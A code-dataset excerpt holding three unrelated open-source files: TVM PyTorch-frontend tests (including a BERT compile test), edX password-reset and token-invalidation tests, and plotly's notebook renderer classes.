def test_numel():
    """torch.numel wrapped into a 0-d tensor, over inputs of several ranks."""

    class Numel(Module):
        def forward(self, data):
            return torch.tensor(torch.numel(data))

    targets = _get_default_vm_targets()
    for shape in [(1,), (3, 5), (3, 5, 8)]:
        verify_script_model(Numel(), [shape], targets)
def test_forward_pretrained_bert_base_uncased():
    ######################################################################
    # This is an example how to run BERT models using TVM
    # ---------------------------------------------------
    """
    Refer the bert example given in https://pypi.org/project/pytorch-pretrained-bert
    # To get started, pretrained bert package needs to be installed as prerequisite.
    .. code-block:: bash
    # install bert package
    pip install pytorch_pretrained_bert==0.6.2 --user
    """
    try:
        from pytorch_pretrained_bert import BertTokenizer, BertForMaskedLM
    except ImportError:
        # Fixed: a bare `except:` here also swallowed SystemExit/KeyboardInterrupt
        # and any unrelated error raised during import; only a missing package
        # should cause the test to be skipped.
        print("Torch pretrained bert package must be installed to run this script.")
        return

    ######################################################################
    # Load the tokenizer and tokenize the input
    # -----------------------------------------
    # Load pre-trained model tokenizer (vocabulary)
    tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")

    # Tokenized input
    text = "[CLS] Who was Jim Henson ? [SEP] Jim Henson was a puppeteer [SEP]"
    tokenized_text = tokenizer.tokenize(text)

    # Mask a token that we will try to predict back with `BertForMaskedLM`
    masked_index = 8
    tokenized_text[masked_index] = "[MASK]"
    assert tokenized_text == [
        "[CLS]",
        "who",
        "was",
        "jim",
        "henson",
        "?",
        "[SEP]",
        "jim",
        "[MASK]",
        "was",
        "a",
        "puppet",
        "##eer",
        "[SEP]",
    ]

    # Convert token to vocabulary indices
    indexed_tokens = tokenizer.convert_tokens_to_ids(tokenized_text)
    # Define sentence A and B indices associated to 1st and 2nd sentences (see paper)
    segments_ids = [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1]

    # Convert inputs to PyTorch tensors
    tokens_tensor = torch.tensor([indexed_tokens])
    segments_tensors = torch.tensor([segments_ids])

    ######################################################################
    # Load a pretrained PyTorch model bert-base-uncased
    # -------------------------------------------------
    # Bert Model with a language modeling
    model = BertForMaskedLM.from_pretrained("bert-base-uncased")
    model.eval()

    ######################################################################
    # Predict all tokens with pytorch
    # -------------------------------
    with torch.no_grad():
        torch_preds = model(tokens_tensor, segments_tensors)

    ######################################################################
    # Make TorchScripted model via jit trace
    # --------------------------------------
    scripted_model = torch.jit.trace(model, (tokens_tensor, segments_tensors)).eval()

    ######################################################################
    # Import the graph to Relay
    # -------------------------
    # Convert PyTorch graph to Relay graph. The input name can be arbitrary.
    input_1 = "input_ids"
    input_2 = "input.2"
    shape_list = [(input_1, list(tokens_tensor.shape)), (input_2, list(segments_tensors.shape))]
    mod, params = relay.frontend.from_pytorch(scripted_model, shape_list)

    ######################################################################
    # Compile the model with relay
    # ----------------------------
    target = "llvm"
    with tvm.transform.PassContext(opt_level=3):
        relay_graph, relay_lib, relay_params = relay.build(mod, target=target, params=params)

    ######################################################################
    # Execute on TVM
    # --------------
    ctx = tvm.context(target, 0)
    relay_model = graph_runtime.create(relay_graph, relay_lib, ctx)
    relay_model.set_input(**relay_params)
    relay_model.set_input(input_1, tokens_tensor)
    relay_model.set_input(input_2, segments_tensors)
    relay_model.run()
    compiled_output = relay_model.get_output(0).asnumpy()

    ######################################################################
    # Validate the outputs
    # --------------------
    # Compare the torch and tvm outputs
    tvm.testing.assert_allclose(torch_preds, compiled_output, rtol=1e-3, atol=1e-3)

    ######################################################################
    # Process the output
    # ------------------
    # Process the model output to token.

    # Torch output to token
    torch_pred_idx = torch.argmax(torch_preds[0, masked_index]).item()
    torch_pred_token = tokenizer.convert_ids_to_tokens([torch_pred_idx])[0]

    # TVM output to token
    tvm_pred_idx = compiled_output[0, masked_index].argmax()
    tvm_pred_token = tokenizer.convert_ids_to_tokens([tvm_pred_idx])[0]

    assert torch_pred_idx == tvm_pred_idx
    assert torch_pred_token == tvm_pred_token

    # Print the outputs
    print("Torch top-1 id: {}, token: {}".format(torch_pred_idx, torch_pred_token))
    print("TVM top-1 id: {}, token: {}".format(tvm_pred_idx, tvm_pred_token))
def test_convert_torch_script_with_input_types():
    """Round-trip a traced function through torch.jit.save/load and verify that
    from_pytorch honors generic user-specified input dtypes ("float" -> float32,
    "int" -> int32) by comparing against a hand-built Relay module.
    """

    def model_fn(x, y):
        x = x.to(dtype=torch.int32)
        y = x + y
        return y

    ishape = (4, 5)
    input_x = torch.rand(ishape, dtype=torch.float32)
    input_y = torch.randint(low=0, high=100, size=ishape, dtype=torch.int32)
    inputs = [input_x, input_y]
    script_module = torch.jit.trace(model_fn, inputs)

    # Fixed: the original wrote a hard-coded "tmp.pt" into the CWD and removed
    # it with os.remove afterwards — collision-prone under parallel test runs
    # and leaked the file if torch.jit.load raised. A TemporaryDirectory gives
    # a private path and guaranteed cleanup.
    import tempfile

    with tempfile.TemporaryDirectory() as tmp_dir:
        fname = os.path.join(tmp_dir, "tmp.pt")
        torch.jit.save(script_module, fname)
        loaded = torch.jit.load(fname)

    verify_model(loaded.eval(), input_data=inputs)

    def expected(x_shape, y_shape):
        # use a fixed order of args so alpha equal check can pass
        x = relay.var("x", shape=x_shape, dtype="float32")
        y = relay.var("y", shape=y_shape, dtype="int32")
        args = [x, y]
        x1 = relay.cast(x, "int32")
        y1 = relay.add(x1, y)
        mod = tvm.IRModule.from_expr(relay.Function(args, y1))
        return mod["main"]

    # Generic dtype names: the frontend must default "float" to float32 and
    # "int" to int32.
    input_infos = [("input0", (ishape, "float")), ("input1", (ishape, "int"))]
    mod, params = relay.frontend.from_pytorch(loaded, input_infos)
    expected_mod = expected(ishape, ishape)
    assert tvm.ir.structural_equal(expected_mod, mod["main"], map_free_vars=True)
if __name__ == "__main__":
    # some structural tests
    test_forward_traced_function()
    test_forward_dtypes()
    test_weight_names()
    test_duplicate_weight_use()

    # Single operator tests
    test_forward_pixel_shuffle()
    test_forward_add()
    test_forward_subtract()
    test_forward_multiply()
    test_forward_matmul()
    test_forward_rsub()
    test_forward_onehot()
    test_forward_embedding()
    test_forward_reshape()
    test_forward_reciprocal()
    test_forward_repeat()
    test_forward_repeat_interleave()
    test_forward_squeeze()
    test_forward_unsqueeze()
    test_forward_concatenate()
    test_forward_reduce_sum()
    test_forward_reduce_prod()
    test_forward_argmin()
    test_forward_argmax()
    test_forward_norm()
    test_forward_frobenius_norm()
    test_forward_std()
    test_forward_variance()
    test_forward_relu()
    test_forward_prelu()
    test_forward_leakyrelu()
    test_forward_elu()
    test_forward_celu()
    test_forward_gelu()
    test_forward_selu()
    test_forward_log_sigmoid()
    test_forward_adaptiveavgpool()
    test_forward_maxpool2d()
    test_forward_maxpool1d()
    test_forward_maxpool3d()
    test_forward_hardtanh()
    test_forward_conv()
    test_forward_conv_transpose()
    test_forward_threshold()
    test_forward_contiguous()
    test_forward_batchnorm()
    test_forward_instancenorm()
    test_forward_layernorm()
    test_forward_groupnorm()
    test_forward_transpose()
    test_forward_size()
    test_forward_view()
    test_forward_select()
    test_forward_take()
    test_forward_topk()
    test_forward_where()
    test_forward_addcdiv()
    test_forward_addcmul()
    test_forward_true_divide()
    test_forward_clone()
    test_forward_softplus()
    test_forward_softsign()
    test_forward_logsoftmax()
    test_forward_sigmoid()
    test_forward_dense()
    test_forward_avgpool()
    test_forward_avgpool3d()
    test_forward_dropout()
    test_forward_slice()
    test_forward_mean()
    test_forward_expand()
    test_forward_pow()
    test_forward_unary()
    test_forward_clamp()
    test_forward_clamp_()
    test_forward_logical_not()
    test_forward_bitwise_not()
    test_forward_bitwise_xor()
    test_forward_logical_xor()
    test_forward_isfinite()
    test_forward_isnan()
    test_forward_isinf()
    test_forward_ones()
    test_forward_ones_like()
    test_forward_zeros()
    test_forward_zeros_like()
    test_forward_full()
    test_forward_full_like()
    test_forward_linspace()
    test_forward_arange()
    test_forward_mesh_grid()
    test_forward_chunk()
    test_forward_split()
    test_forward_gather()
    test_upsample()
    test_forward_upsample3d()
    test_forward_nms()
    test_forward_roi_align()
    test_to()
    test_flatten()
    test_type_as()
    test_forward_functional_pad()
    test_forward_zero_pad2d()
    test_forward_constant_pad1d()
    test_forward_constant_pad2d()
    test_forward_constant_pad3d()
    test_forward_reflection_pad1d()
    test_forward_reflection_pad2d()
    test_forward_replication_pad1d()
    test_forward_replication_pad2d()
    test_forward_replication_pad3d()
    test_adaptive_pool3d()
    test_conv3d()
    test_conv3d_transpose()
    test_forward_index()
    test_min_max()
    test_logsumexp()
    test_stack()
    test_stack_dynamic()
    test_forward_unbind()
    test_forward_nonzero()
    test_forward_scatter()
    test_numel()

    # Model tests
    test_resnet18()
    test_squeezenet1_0()
    test_squeezenet1_1()
    test_densenet121()
    # disable inception test for now, since loading it takes ~5min on torchvision-0.5 due to scipy bug
    # See https://discuss.pytorch.org/t/torchvisions-inception-v3-takes-much-longer-to-load-than-other-models/68756
    # test_inception_v3()
    test_googlenet()
    test_mnasnet0_5()
    test_mobilenet_v2()

    test_custom_conversion_map()

    test_segmentaton_models()
    test_3d_models()

    # Quantization test
    from qnn_test import test_quantized_imagenet, test_quantized_modules

    test_quantized_modules()
    test_quantized_imagenet()

    # Test simple conditionals and loop
    test_control_flow()
    test_simple_rnn()

    # More complex recurrent models
    from test_lstm import test_custom_lstm

    test_custom_lstm()

    # Test bert model
    test_forward_pretrained_bert_base_uncased()

    # Test convert torch script(jit) with specific inputs' types
    test_convert_torch_script_with_input_types()
| sxjscience/tvm | tests/python/frontend/pytorch/test_forward.py | Python | apache-2.0 | 113,518 | [
"VisIt"
] | 6be4db87a52e0be62f1e25322e17a1dfc219c93accb921b1c271b3f9329c3566 |
# -*- coding: utf-8 -*-
"""
Tests for user authorization password-related functionality.
"""
import json
import logging
import re
import ddt
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core import mail
from django.test import TestCase
from django.test.client import RequestFactory
from django.urls import reverse
from mock import Mock, patch
from oauth2_provider.models import AccessToken as dot_access_token
from oauth2_provider.models import RefreshToken as dot_refresh_token
from testfixtures import LogCapture
from openedx.core.djangoapps.oauth_dispatch.tests import factories as dot_factories
from openedx.core.djangoapps.site_configuration.tests.factories import SiteFactory
from openedx.core.djangoapps.user_api.accounts.tests.test_api import CreateAccountMixin
from openedx.core.djangoapps.user_api.errors import UserAPIInternalError, UserNotFound
from openedx.core.djangoapps.user_authn.views.password_reset import request_password_change
from openedx.core.djangolib.testing.utils import CacheIsolationTestCase, skip_unless_lms
LOGGER_NAME = 'audit'
User = get_user_model() # pylint:disable=invalid-name
class TestRequestPasswordChange(CreateAccountMixin, TestCase):
    """
    Tests for users who request a password change.
    """
    USERNAME = u'claire-underwood'
    PASSWORD = u'ṕáśśẃőŕd'
    EMAIL = u'claire+underwood@example.com'
    IS_SECURE = False

    @skip_unless_lms
    def test_request_password_change(self):
        # Create and activate an account; account creation sends the first email.
        self.create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
        self.assertEqual(len(mail.outbox), 1)

        request = RequestFactory().post('/password')
        request.user = Mock()
        request.site = SiteFactory()

        with patch('crum.get_current_request', return_value=request):
            # Request a password change
            request_password_change(self.EMAIL, self.IS_SECURE)

        # Verify that a new email message has been sent
        self.assertEqual(len(mail.outbox), 2)

        # Verify that the body of the message contains something that looks
        # like an activation link
        email_body = mail.outbox[0].body
        result = re.search(r'(?P<url>https?://[^\s]+)', email_body)
        self.assertIsNot(result, None)

    @skip_unless_lms
    def test_request_password_change_invalid_user(self):
        # No account exists for this address, so the request must fail loudly.
        with self.assertRaises(UserNotFound):
            request_password_change(self.EMAIL, self.IS_SECURE)

        # Verify that no email messages have been sent
        self.assertEqual(len(mail.outbox), 0)

    @skip_unless_lms
    def test_request_password_change_inactive_user(self):
        # Create an account, but do not activate it
        self.create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
        self.assertEqual(len(mail.outbox), 1)

        request = RequestFactory().post('/password')
        request.user = Mock()
        request.site = SiteFactory()

        with patch('crum.get_current_request', return_value=request):
            request_password_change(self.EMAIL, self.IS_SECURE)

        # Verify that the password change email was still sent
        self.assertEqual(len(mail.outbox), 2)
@skip_unless_lms
@ddt.ddt
class TestPasswordChange(CreateAccountMixin, CacheIsolationTestCase):
    """ Tests for views that change the user's password. """

    USERNAME = u"heisenberg"
    ALTERNATE_USERNAME = u"walt"
    OLD_PASSWORD = u"ḅḷüëṡḳÿ"
    NEW_PASSWORD = u"B🄸🄶B🄻🅄🄴"
    OLD_EMAIL = u"walter@graymattertech.com"
    NEW_EMAIL = u"walt@savewalterwhite.com"
    INVALID_KEY = u"123abc"
    ENABLED_CACHES = ['default']

    def setUp(self):
        super(TestPasswordChange, self).setUp()
        # Create an active account and log in; clear the signup email so each
        # test starts with an empty outbox.
        self.create_account(self.USERNAME, self.OLD_PASSWORD, self.OLD_EMAIL)
        result = self.client.login(username=self.USERNAME, password=self.OLD_PASSWORD)
        self.assertTrue(result)
        mail.outbox = []

    def test_password_change(self):
        # Request a password change while logged in, simulating
        # use of the password reset link from the account page
        response = self._change_password()
        self.assertEqual(response.status_code, 200)

        # Check that an email was sent
        self.assertEqual(len(mail.outbox), 1)

        # Retrieve the activation link from the email body
        email_body = mail.outbox[0].body
        result = re.search(r'(?P<url>https?://[^\s]+)', email_body)
        self.assertIsNot(result, None)
        activation_link = result.group('url')

        # Visit the activation link
        response = self.client.get(activation_link)
        self.assertEqual(response.status_code, 200)

        # Submit a new password and follow the redirect to the success page
        response = self.client.post(
            activation_link,
            # These keys are from the form on the current password reset confirmation page.
            {'new_password1': self.NEW_PASSWORD, 'new_password2': self.NEW_PASSWORD},
            follow=True
        )
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "Your password has been reset.")

        # Log the user out to clear session data
        self.client.logout()

        # Verify that the new password can be used to log in
        login_api_url = reverse('login_api')
        response = self.client.post(login_api_url, {'email': self.OLD_EMAIL, 'password': self.NEW_PASSWORD})
        assert response.status_code == 200
        response_dict = json.loads(response.content.decode('utf-8'))
        assert response_dict['success']

        # Try reusing the activation link to change the password again
        # Visit the activation link again.
        response = self.client.get(activation_link)
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "This password reset link is invalid. It may have been used already.")

        self.client.logout()

        # Verify that the old password cannot be used to log in
        result = self.client.login(username=self.USERNAME, password=self.OLD_PASSWORD)
        self.assertFalse(result)

        # Verify that the new password continues to be valid
        response = self.client.post(login_api_url, {'email': self.OLD_EMAIL, 'password': self.NEW_PASSWORD})
        assert response.status_code == 200
        response_dict = json.loads(response.content.decode('utf-8'))
        assert response_dict['success']

    def test_password_change_failure(self):
        with patch(
            'openedx.core.djangoapps.user_authn.views.password_reset.request_password_change',
            side_effect=UserAPIInternalError,
        ):
            self._change_password()
            # NOTE(review): assertRaises is called here without a callable, so
            # it only constructs a context manager that is never entered — this
            # assertion is a no-op. Confirm intent and consider
            # `with self.assertRaises(UserAPIInternalError):` instead.
            self.assertRaises(UserAPIInternalError)

    @patch.dict(settings.FEATURES, {'ENABLE_PASSWORD_RESET_FAILURE_EMAIL': True})
    def test_password_reset_failure_email(self):
        """Test that a password reset failure email notification is sent, when enabled."""
        # Log the user out
        self.client.logout()

        bad_email = 'doesnotexist@example.com'
        response = self._change_password(email=bad_email)
        self.assertEqual(response.status_code, 200)

        # Check that an email was sent
        self.assertEqual(len(mail.outbox), 1)

        # Verify that the body contains the failed password reset message
        sent_message = mail.outbox[0]
        text_body = sent_message.body
        html_body = sent_message.alternatives[0][0]

        for email_body in [text_body, html_body]:
            msg = u'However, there is currently no user account associated with your email address: {email}'.format(
                email=bad_email
            )
            assert u'reset for your user account at {}'.format(settings.PLATFORM_NAME) in email_body
            assert 'password_reset_confirm' not in email_body, 'The link should not be added if user was not found'
            assert msg in email_body

    @ddt.data(True, False)
    def test_password_change_logged_out(self, send_email):
        # Log the user out
        self.client.logout()

        # Request a password change while logged out, simulating
        # use of the password reset link from the login page
        if send_email:
            response = self._change_password(email=self.OLD_EMAIL)
            self.assertEqual(response.status_code, 200)
        else:
            # Don't send an email in the POST data, simulating
            # its (potentially accidental) omission in the POST
            # data sent from the login page
            response = self._change_password()
            self.assertEqual(response.status_code, 400)

    def test_access_token_invalidation_logged_out(self):
        self.client.logout()
        user = User.objects.get(email=self.OLD_EMAIL)
        self._create_dot_tokens(user)
        response = self._change_password(email=self.OLD_EMAIL)
        self.assertEqual(response.status_code, 200)
        self._assert_access_token_destroyed(user)

    def test_access_token_invalidation_logged_in(self):
        user = User.objects.get(email=self.OLD_EMAIL)
        self._create_dot_tokens(user)
        response = self._change_password()
        self.assertEqual(response.status_code, 200)
        self._assert_access_token_destroyed(user)

    def test_password_change_inactive_user(self):
        # Log out the user created during test setup
        self.client.logout()

        # Create a second user, but do not activate it
        self.create_account(self.ALTERNATE_USERNAME, self.OLD_PASSWORD, self.NEW_EMAIL)
        mail.outbox = []

        # Send the view the email address tied to the inactive user
        response = self._change_password(email=self.NEW_EMAIL)

        # Expect that the activation email is still sent,
        # since the user may have lost the original activation email.
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(mail.outbox), 1)

    def test_password_change_no_user(self):
        # Log out the user created during test setup
        self.client.logout()

        with LogCapture(LOGGER_NAME, level=logging.INFO) as logger:
            # Send the view an email address not tied to any user
            response = self._change_password(email=self.NEW_EMAIL)
            self.assertEqual(response.status_code, 200)

        logger.check((LOGGER_NAME, 'INFO', 'Invalid password reset attempt'))

    def test_password_change_rate_limited(self):
        """
        Tests that consecutive password reset requests are rate limited.
        """
        # Log out the user created during test setup, to prevent the view from
        # selecting the logged-in user's email address over the email provided
        # in the POST data
        self.client.logout()

        # First request succeeds; the immediate second one is throttled.
        for status in [200, 403]:
            response = self._change_password(email=self.NEW_EMAIL)
            self.assertEqual(response.status_code, status)

        # With the rate limiter forced off, the request succeeds again.
        with patch(
            'util.request_rate_limiter.PasswordResetEmailRateLimiter.is_rate_limit_exceeded',
            return_value=False
        ):
            response = self._change_password(email=self.NEW_EMAIL)
            self.assertEqual(response.status_code, 200)

    @ddt.data(
        ('post', 'password_change_request', []),
    )
    @ddt.unpack
    def test_require_http_method(self, correct_method, url_name, args):
        wrong_methods = {'get', 'put', 'post', 'head', 'options', 'delete'} - {correct_method}
        url = reverse(url_name, args=args)

        for method in wrong_methods:
            response = getattr(self.client, method)(url)
            self.assertEqual(response.status_code, 405)

    def _change_password(self, email=None):
        """Request to change the user's password. """
        data = {}
        if email:
            data['email'] = email
        return self.client.post(path=reverse('password_change_request'), data=data)

    def _create_dot_tokens(self, user=None):
        """Create dot access token for given user if user provided else for default user."""
        if not user:
            user = User.objects.get(email=self.OLD_EMAIL)
        application = dot_factories.ApplicationFactory(user=user)
        access_token = dot_factories.AccessTokenFactory(user=user, application=application)
        dot_factories.RefreshTokenFactory(user=user, application=application, access_token=access_token)

    def _assert_access_token_destroyed(self, user):
        """Assert all access tokens are destroyed."""
        self.assertFalse(dot_access_token.objects.filter(user=user).exists())
        self.assertFalse(dot_refresh_token.objects.filter(user=user).exists())
| appsembler/edx-platform | openedx/core/djangoapps/user_authn/views/tests/test_password.py | Python | agpl-3.0 | 12,725 | [
"VisIt"
] | 14de40d42c1f4079491bf3500966d1b493237c4dcf2b144ee39e50196fa1c752 |
from __future__ import absolute_import
import base64
import json
import webbrowser
import inspect
import os
from os.path import isdir
import six
from plotly import utils, optional_imports
from plotly.io import to_json, to_image, write_image, write_html
from plotly.io._orca import ensure_server
from plotly.io._utils import plotly_cdn_url
from plotly.offline.offline import _get_jconfig, get_plotlyjs
from plotly.tools import return_figure_from_figure_or_data
ipython_display = optional_imports.get_module("IPython.display")
IPython = optional_imports.get_module("IPython")
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2.7
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
class BaseRenderer(object):
    """
    Base class for all renderers
    """

    def activate(self):
        # Hook for renderer-specific one-time setup; no-op by default.
        pass

    def __repr__(self):
        try:
            signature = inspect.signature(self.__init__)
            arg_names = list(signature.parameters.keys())
        except AttributeError:
            # Python 2.7: inspect.signature is unavailable, fall back to getargspec.
            argspec = inspect.getargspec(self.__init__)
            arg_names = [a for a in argspec.args if a != "self"]

        attr_text = ", ".join(
            "{}={!r}".format(name, self.__dict__[name]) for name in arg_names
        )
        return "{cls}({attrs})\n{doc}".format(
            cls=type(self).__name__, attrs=attr_text, doc=self.__doc__
        )

    def __hash__(self):
        # Constructor args fully define uniqueness
        return hash(repr(self))
class MimetypeRenderer(BaseRenderer):
    """
    Base class for all mime type renderers
    """

    def to_mimebundle(self, fig_dict):
        # Subclasses must convert a figure dict into a Jupyter mime bundle.
        raise NotImplementedError()
class JsonRenderer(MimetypeRenderer):
    """
    Renderer to display figures as JSON hierarchies. This renderer is
    compatible with JupyterLab and VSCode.
    mime type: 'application/json'
    """

    def to_mimebundle(self, fig_dict):
        # Round-trip through the plotly JSON encoder so the payload is plain,
        # JSON-serializable data (trace uids are kept).
        fig_json = to_json(fig_dict, validate=False, remove_uids=False)
        return {"application/json": json.loads(fig_json)}
# Plotly mimetype
class PlotlyRenderer(MimetypeRenderer):
    """
    Renderer to display figures using the plotly mime type. This renderer is
    compatible with JupyterLab (using the @jupyterlab/plotly-extension),
    VSCode, and nteract.
    mime type: 'application/vnd.plotly.v1+json'
    """

    def __init__(self, config=None):
        # Copy the config dict so later mutations by the caller don't leak in.
        self.config = dict(config) if config else {}

    def to_mimebundle(self, fig_dict):
        config = _get_jconfig(self.config)
        if config:
            fig_dict["config"] = config
        fig_json = to_json(fig_dict, validate=False, remove_uids=False)
        return {"application/vnd.plotly.v1+json": json.loads(fig_json)}
# Static Image
class ImageRenderer(MimetypeRenderer):
    """
    Base class for all static image renderers
    """

    def __init__(
        self,
        mime_type,
        b64_encode=False,
        format=None,
        width=None,
        height=None,
        scale=None,
        engine="auto",
    ):
        self.mime_type = mime_type
        self.b64_encode = b64_encode
        self.format = format
        self.width = width
        self.height = height
        self.scale = scale
        self.engine = engine

    def to_mimebundle(self, fig_dict):
        # Render the figure to raw image bytes with the configured backend.
        image_bytes = to_image(
            fig_dict,
            format=self.format,
            width=self.width,
            height=self.height,
            scale=self.scale,
            validate=False,
            engine=self.engine,
        )

        # Binary formats (png/jpeg/pdf) are base64-encoded for the bundle;
        # text formats (svg) are decoded directly.
        if self.b64_encode:
            payload = base64.b64encode(image_bytes).decode("utf8")
        else:
            payload = image_bytes.decode("utf8")

        return {self.mime_type: payload}
class PngRenderer(ImageRenderer):
    """
    Renderer to display figures as static PNG images. This renderer requires
    either the kaleido package or the orca command-line utility and is broadly
    compatible across IPython environments (classic Jupyter Notebook, JupyterLab,
    QtConsole, VSCode, PyCharm, etc) and nbconvert targets (HTML, PDF, etc.).
    mime type: 'image/png'
    """

    def __init__(self, width=None, height=None, scale=None, engine="auto"):
        # PNG is binary, so it must be base64-encoded in the mime bundle.
        super(PngRenderer, self).__init__(
            mime_type="image/png",
            b64_encode=True,
            format="png",
            width=width,
            height=height,
            scale=scale,
            engine=engine,
        )
class SvgRenderer(ImageRenderer):
    """
    Renderer to display figures as static SVG images. This renderer requires
    either the kaleido package or the orca command-line utility and is broadly
    compatible across IPython environments (classic Jupyter Notebook, JupyterLab,
    QtConsole, VSCode, PyCharm, etc) and nbconvert targets (HTML, PDF, etc.).
    mime type: 'image/svg+xml'
    """

    def __init__(self, width=None, height=None, scale=None, engine="auto"):
        # SVG is text, so no base64 encoding is needed.
        super(SvgRenderer, self).__init__(
            mime_type="image/svg+xml",
            b64_encode=False,
            format="svg",
            width=width,
            height=height,
            scale=scale,
            engine=engine,
        )
class JpegRenderer(ImageRenderer):
    """
    Renderer to display figures as static JPEG images. This renderer requires
    either the kaleido package or the orca command-line utility and is broadly
    compatible across IPython environments (classic Jupyter Notebook, JupyterLab,
    QtConsole, VSCode, PyCharm, etc) and nbconvert targets (HTML, PDF, etc.).
    mime type: 'image/jpeg'
    """

    def __init__(self, width=None, height=None, scale=None, engine="auto"):
        # JPEG is binary, so it must be base64-encoded in the mime bundle.
        super(JpegRenderer, self).__init__(
            mime_type="image/jpeg",
            b64_encode=True,
            format="jpg",
            width=width,
            height=height,
            scale=scale,
            engine=engine,
        )
class PdfRenderer(ImageRenderer):
    """
    Renderer to display figures as static PDF images. This renderer requires
    either the kaleido package or the orca command-line utility and is compatible
    with JupyterLab and the LaTeX-based nbconvert export to PDF.
    mime type: 'application/pdf'
    """

    def __init__(self, width=None, height=None, scale=None, engine="auto"):
        # PDF is binary, so it must be base64-encoded in the mime bundle.
        super(PdfRenderer, self).__init__(
            mime_type="application/pdf",
            b64_encode=True,
            format="pdf",
            width=width,
            height=height,
            scale=scale,
            engine=engine,
        )
# HTML
# Build script to set global PlotlyConfig object. This must execute before
# plotly.js is loaded.
_window_plotly_config = """\
window.PlotlyConfig = {MathJaxConfig: 'local'};"""
# JS snippet that, when MathJax is present, configures it to render SVG output
# with the STIX-Web font.
_mathjax_config = """\
if (window.MathJax) {MathJax.Hub.Config({SVG: {font: "STIX-Web"}});}"""
class HtmlRenderer(MimetypeRenderer):
"""
Base class for all HTML mime type renderers
mime type: 'text/html'
"""
def __init__(
self,
connected=False,
full_html=False,
requirejs=True,
global_init=False,
config=None,
auto_play=False,
post_script=None,
animation_opts=None,
):
# Copy of the plotly.js config dict (empty when None was passed).
self.config = dict(config) if config else {}
self.auto_play = auto_play
self.connected = connected
self.global_init = global_init
self.requirejs = requirejs
self.full_html = full_html
self.animation_opts = animation_opts
self.post_script = post_script
# Inject a require.js setup script into the notebook so later figures can
# load plotly.js either from the CDN (connected) or from an embedded copy.
# Only meaningful when global_init=True; requires IPython and requirejs.
def activate(self):
if self.global_init:
if not ipython_display:
raise ValueError(
"The {cls} class requires ipython but it is not installed".format(
cls=self.__class__.__name__
)
)
if not self.requirejs:
raise ValueError("global_init is only supported with requirejs=True")
if self.connected:
# Connected so we configure requirejs with the plotly CDN
script = """\
<script type="text/javascript">
{win_config}
{mathjax_config}
if (typeof require !== 'undefined') {{
require.undef("plotly");
requirejs.config({{
paths: {{
'plotly': ['{plotly_cdn}']
}}
}});
require(['plotly'], function(Plotly) {{
window._Plotly = Plotly;
}});
}}
</script>
""".format(
win_config=_window_plotly_config,
mathjax_config=_mathjax_config,
plotly_cdn=plotly_cdn_url().rstrip(".js"),
)
else:
# If not connected then we embed a copy of the plotly.js
# library in the notebook
script = """\
<script type="text/javascript">
{win_config}
{mathjax_config}
if (typeof require !== 'undefined') {{
require.undef("plotly");
define('plotly', function(require, exports, module) {{
{script}
}});
require(['plotly'], function(Plotly) {{
window._Plotly = Plotly;
}});
}}
</script>
""".format(
script=get_plotlyjs(),
win_config=_window_plotly_config,
mathjax_config=_mathjax_config,
)
ipython_display.display_html(script, raw=True)
# Render the figure dict to an HTML snippet (or full page) via plotly's
# to_html, choosing how plotly.js and MathJax are sourced from the
# requirejs/connected flags set at construction time.
def to_mimebundle(self, fig_dict):
from plotly.io import to_html
if self.requirejs:
include_plotlyjs = "require"
include_mathjax = False
elif self.connected:
include_plotlyjs = "cdn"
include_mathjax = "cdn"
else:
include_plotlyjs = True
include_mathjax = "cdn"
# build post script
# JS that purges the figure when its output cell or notebook container is
# removed from the DOM, to avoid leaking WebGL contexts/listeners.
# NOTE(review): this template mixes {{ }} escapes with single-brace
# {childList: true} — verify how to_html formats post_script entries.
post_script = [
"""
var gd = document.getElementById('{plot_id}');
var x = new MutationObserver(function (mutations, observer) {{
var display = window.getComputedStyle(gd).display;
if (!display || display === 'none') {{
console.log([gd, 'removed!']);
Plotly.purge(gd);
observer.disconnect();
}}
}});
// Listen for the removal of the full notebook cells
var notebookContainer = gd.closest('#notebook-container');
if (notebookContainer) {{
x.observe(notebookContainer, {childList: true});
}}
// Listen for the clearing of the current output cell
var outputEl = gd.closest('.output');
if (outputEl) {{
x.observe(outputEl, {childList: true});
}}
"""
]
# Add user defined post script
if self.post_script:
if not isinstance(self.post_script, (list, tuple)):
post_script.append(self.post_script)
else:
post_script.extend(self.post_script)
html = to_html(
fig_dict,
config=self.config,
auto_play=self.auto_play,
include_plotlyjs=include_plotlyjs,
include_mathjax=include_mathjax,
post_script=post_script,
full_html=self.full_html,
animation_opts=self.animation_opts,
default_width="100%",
default_height=525,
validate=False,
)
return {"text/html": html}
class NotebookRenderer(HtmlRenderer):
    """
    Renderer for the classic Jupyter Notebook (mime type 'text/html').

    Produces partial-HTML output backed by require.js and performs global
    notebook initialization when activated, so notebooks converted with
    nbconvert/nbviewer remain standalone and interactive.
    """

    def __init__(
        self,
        connected=False,
        config=None,
        auto_play=False,
        post_script=None,
        animation_opts=None,
    ):
        # Options that define the classic-notebook rendering mode.
        notebook_mode = dict(
            full_html=False,
            requirejs=True,
            global_init=True,
        )
        super(NotebookRenderer, self).__init__(
            connected=connected,
            config=config,
            auto_play=auto_play,
            post_script=post_script,
            animation_opts=animation_opts,
            **notebook_mode
        )
class KaggleRenderer(HtmlRenderer):
    """
    Renderer for Kaggle Notebooks (mime type 'text/html').

    Behaves like NotebookRenderer except that connected=True, so the
    plotly.js bundle is loaded from a CDN instead of being embedded.
    Enabled by default when running inside a Kaggle notebook.
    """

    def __init__(
        self, config=None, auto_play=False, post_script=None, animation_opts=None
    ):
        super(KaggleRenderer, self).__init__(
            config=config,
            auto_play=auto_play,
            post_script=post_script,
            animation_opts=animation_opts,
            # CDN-backed, partial-HTML, require.js output with global init.
            connected=True,
            full_html=False,
            requirejs=True,
            global_init=True,
        )
class AzureRenderer(HtmlRenderer):
    """
    Renderer for Azure Notebooks (mime type 'text/html').

    Identical configuration to KaggleRenderer: plotly.js comes from a CDN
    (connected=True) rather than being embedded in the notebook. Enabled
    by default when running inside an Azure notebook.
    """

    def __init__(
